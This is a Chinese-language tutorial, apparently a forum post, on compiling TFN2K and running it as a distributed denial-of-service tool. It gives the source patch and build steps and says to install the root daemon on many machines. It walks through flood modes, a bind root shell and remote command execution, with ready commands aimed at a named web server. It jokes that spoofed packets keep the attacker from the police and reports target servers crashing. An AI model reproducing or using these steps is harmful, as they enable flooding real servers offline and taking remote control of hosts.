首先說我們用來攻擊的客戶機和服務器的配置方法,使用當下最有名的REDHAT LINUX進行測試,本次攻擊測試我使用的是FEDORA CORE3 ,軟件用的是最有名的DDOS。
廢話不說了,開始設置服務器。
解壓 tar -zxvf tfn2k.tgz
一.安裝TFN2K
TFN2K為開放原代碼的軟件,所以需要我們進行編譯,這個不用說了,編譯應該都會的吧,但有幾個地方是必需注意的,因為使用不同版本和廠商的LINUX需要不同的設置。
先修改src/ip.h
注釋掉以下部分,否則編譯出錯。 /*struct in_addr
{
unsigned long int s_addr;
};*/
然後make進行編譯
編譯時會提示你輸入服務器端進行密碼設置8-32位,(攻擊的時候需要輸入密碼)編譯後會出現兩個新的執行文件td 和 tfn,其中td是守護進程,也是客戶機的使用進程。而tfn是服務器控制進程,如果想攻擊別人就必需先起動td這個進程,然後再運行服務器進程,否則攻 擊無效,更改密碼可以執行mkpass進行更改。最後在所有的客戶機中安裝並運行td(需要ROOT權限),並且在服務器上建立一個文本文件,文件中記錄 所有的客戶機IP地址(用VI編輯一個就可行了),格式為:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
……
然後在主服務器上運行./tfn
二.攻擊
./tfn直接回車大家可以看到一些參數,英文好的朋友估計不用我來多講了:)
格式./tfn <參數>
無用的參數我們不提,我們來說攻擊用的
-f 這個參數後面跟剛才所寫的文本文件名,就是真正實現DDOS攻擊,而不是DOS
-h DOS攻擊,也就是單機,一對一的攻擊 後面跟一個主機或IP地址
-p 後面指定一個端口,不用說了
-c 最關鍵的參數,一共有11個選相
0 - 停止攻擊,發善心用的
1 - 反欺騙等級設定 ,因為TFN這個工具在攻擊的時候所發出的數據包是帶有源地址的,但是源地址是隨機的,也就是說地址不是你自給的,所以不用擔心警察抓,哈哈
2 - 改編數據包的包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過改變每個包的有效載荷的字節增加它的大小。
3 - 綁定root shell:啟動一個會話服務,然後你連接一個指定端口就可以得到一個root shell。
4 - UDP洪水攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。
5 - SYN洪水攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力,是標准的拒絕服務攻擊.
6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同大小的響應包。
7 - SMURF攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回復一個多倍的回復。
8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由器,其它包轉發設備,NIDS,sniffers等,輪番轟炸:)
9 - TARGA3攻擊
10 - 遠程命令執行,這個參數是TFN的附加功能,其實TFN的攻擊不僅僅是DOS,還可以遠程的進行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立edison,-i後面跟"命令"
參數基本說完,下面攻擊
./tfn -f hostext -c 4 -i www.xxx.com
使用hostext文件中記錄的主機對163服務器進行UDP攻擊(所有的主機中必需已經起動td進程)
./tfn -f hostext -c 5 -i www.xxx.com -p 80
使用hostext文件中記錄的主機對163服務器進行TCP拒絕服務攻擊(80攻擊WEB,其他不用說了)
./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中記錄的主機對163服務器進行ICMP攻擊(PING攻擊,緩沖區溢出馬上死機)
./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中記錄的主機對163服務器進行ICMP&TCP&UDP輪番攻擊(如果對方是sniffer一定哭死)
./tfn -f hostext -c 0
讓所由主機停止攻擊
基本說完,最後說說我的測試結果
一對一攻擊,攻擊方式TCP 連接方式本地 本地CPU13% 被攻擊的服務器CPU使用率70%以上,並時時波動
二對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器CPU使用率100%
五對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器死機.本人家裡只有6台機器,但如果再多點,幾十台機器,一般的個人服務器肯定要死掉了
一對一攻擊,攻擊方式ICMP 連接方式本地 本地CPU18% 被攻擊的服務器CPU使用率96%以上,並時時波動二對一攻擊,攻擊方式ICMP 連接方式本地 本地單機CPU18% 被攻擊的服務器以經無法上網,幾乎無法使用,半小時內死機.看來威力不小